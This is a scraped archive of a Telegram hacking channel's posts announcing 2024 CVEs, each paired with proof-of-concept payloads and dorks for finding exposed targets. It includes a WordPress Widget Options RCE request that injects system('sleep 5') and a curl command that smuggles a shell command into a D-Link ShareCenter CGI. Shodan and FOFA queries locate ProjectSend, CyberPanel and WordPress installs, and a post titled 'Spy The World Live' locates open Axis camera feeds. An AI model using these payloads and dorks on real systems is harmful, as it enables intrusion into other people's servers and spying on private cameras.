en
Feedback
HackTheBox Academy

HackTheBox Academy

Closed channel

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Show more
3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
↔️ CVE-2024-11680 ❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful
↔️ CVE-2024-11680 ❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. 🖥 Exploit - POC 🔎ZoomEye:
app="ProjectSend"
🔎fofa.info:
(title="Log In » " && header="Set-Cookie: PHPSESSID" && body="ckeditor.js" && body="jquery-migrate.min.js") || body="target=\"_blank\">ProjectSend"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-11680 ❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful
↔️ CVE-2024-11680 ❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. 🖥 Exploit - POC 🔎ZoomEye:
app="ProjectSend"
🔎fofa.info:
(title="Log In » " && header="Set-Cookie: PHPSESSID" && body="ckeditor.js" && body="jquery-migrate.min.js") || body="target=\"_blank\">ProjectSend"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-51378 ❗️ getresetstatus in dns/views.py and ftp/views.py in CyberPanel before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands. 🖥 Exploit - POC 🔎hunter.how:
product.name="CyberPanel"
🔎fofa.info:
app="CyberPanel"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

GoFOFA is a command-line tool for the FOFA API written in Golang. 🖥 GitHub #Tools #BugBounty #Security #Vulnerability #Red_T
GoFOFA is a command-line tool for the FOFA API written in Golang. 🖥 GitHub #Tools #BugBounty #Security #Vulnerability #Red_Team #Hunt ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🧑‍💻 آموزش تست نفوذ را با ما تجربه کنید : [+]تست نفوذ شبکه و وب و SOC را رایگان یاد بگیر . [+]مهندسی اجتماعی را رایگان یاد ب
🧑‍💻 آموزش تست نفوذ را با ما تجربه کنید : [+]تست نفوذ شبکه و وب و SOC را رایگان یاد بگیر . [+]مهندسی اجتماعی را رایگان یاد بگیر . [+]زبان C برای هکرها  و فراتر از آن ! [+]ابزار نویسی با پایتون را رایگان یاد بگیر . [+]مفاهیم پایه امنیت را با ما یاد بگیر . [+]نکات و ابزار ها و کاربا ابزارهای امنیتی و  مقاله های امنیت را در کانال ما دنبال کنید . [+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید . [+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟ [+] پرینتر هکینگ [+] اصول اولیه PowerShell و PowerShell Scripting را بیاموزید. [+] مقدمه ای بر امنیت سایبری [+] مینی‌دوره Linux command-line [+] دوره جامع network+ 🔖 و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .به دنیای آموزش رایگان تست نفوذ خوش اومدید . 💠 @TryHackBox

sticker.webp0.24 KB

🔠 URLFinder ⭐️ URLFinder is a high-speed, passive URL discovery tool designed to simplify and accelerate web asset discovery
🔠 URLFinder ⭐️ URLFinder is a high-speed, passive URL discovery tool designed to simplify and accelerate web asset discovery, ideal for penetration testers, security researchers, and developers looking to gather URLs without active scanning. 💫 Features: 💜 Curated Passive Sources to maximize comprehensive URL discovery 💜 Supports multiple output formats (JSON, file, stdout) 💜 Optimized for Speed and resource efficiency 💜 STDIN/OUT support for easy integration into existing workflows 🖥 GitHub 👩‍💻 Installation:
go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest
#Web #Tools #Recon #Pentest #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-8672 ❗️ The Widget Options – The #1 WordPress Widget & Block Control Plugin for WordPress is vulnerable to Remote
↔️ CVE-2024-8672 ❗️ The Widget Options – The #1 WordPress Widget & Block Control Plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 🖥 Exploit - POC
GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes[commentsToShow]=5&attributes[displayAvatar]=true&attributes[displayDate]=true&attributes[displayExcerpt]=true&attributes[extended_widget_opts][class][logic]=system('sleep 5');&post_id=91&_locale=site HTTP/1.1
Host: localhost:5555
X-WP-Nonce: 365b68356c
Cookie: wordpress_logged_in_fake_cookie=invalid|123456789|fake_cookie
🔎 FOFA:
body="wp-content/plugins/widget-options/"
🔎 Google:
inurl:"wp-content/plugins/widget-options/"
#Web #Exploit #Vulnerability #CVE #Pentest #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-38193 ❗️ Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 🖥 Exploit - POC #Eth
↔️ CVE-2024-38193 ❗️ Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 🖥 Exploit - POC #Ethical_Hacker #Exploit #Vulnerability #CVE #Pentest #Privilege_Escalation ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

📌#WriteUp Community *************** 🗓Date: Tue, 03 Dec 2024 04:38:43 +0000 *************** ✏️Title: Hackers Can Exploit Windows Driver Use-After-Free Vulnerability (CVE-2024-38193) to Gain Systems Privileges *************** 📎Link: https://cybersecuritynews.com/?p=85090 *************** ⚙️Tags: #NEWS #Cyber_Security #Hacker_News *************** ♦️Join: @HackTheBox_Academy ♦️Join: @HackTheBox_Security

In last 3 days , We have a lot of new friends joining our channel, but the number of members shown on the channel has decreas
In last 3 days , We have a lot of new friends joining our channel, but the number of members shown on the channel has decrease from 3520 to 3510.😂🤦‍♂️ is It Joke ? 😂😂😂

❗️ Spy The World Live. FOFA: title="live view" SHODAN: http.title:"Live view - AXIS"
❗️ Spy The World Live. FOFA:
title="live view"
SHODAN:
http.title:"Live view - AXIS"

😈

CVE-2024-10915.yaml0.02 KB

❗️ How To Detect and Exploit CVE-2024-10915. 🔎SHODAN:
http.html:"sharecenter"
🔎FOFA:
body="sharecenter"
👩‍💻 POC:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;<INJECTED_SHELL_COMMAND>;%27"
☑️Thanks to the video provider. #CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #RCE ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🔵 #WordPress Juicy End Points.
wp-admin.php wp-config.php wp-content/uploads wp-load wp-signup.php wp-json wp-includes index.php wp-login.php wp-links-opml.php wp-activate.php wp-blog-header.php wp-cron.php wp-links.php wp-mail.php xmlrpc.php wp-setting.php wp-trackback.php wp-signup.php admin-bar.php
#Ethical_Hacker #Pentest #BugBounty ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

Useful #Wireshark Filters
Useful #Wireshark Filters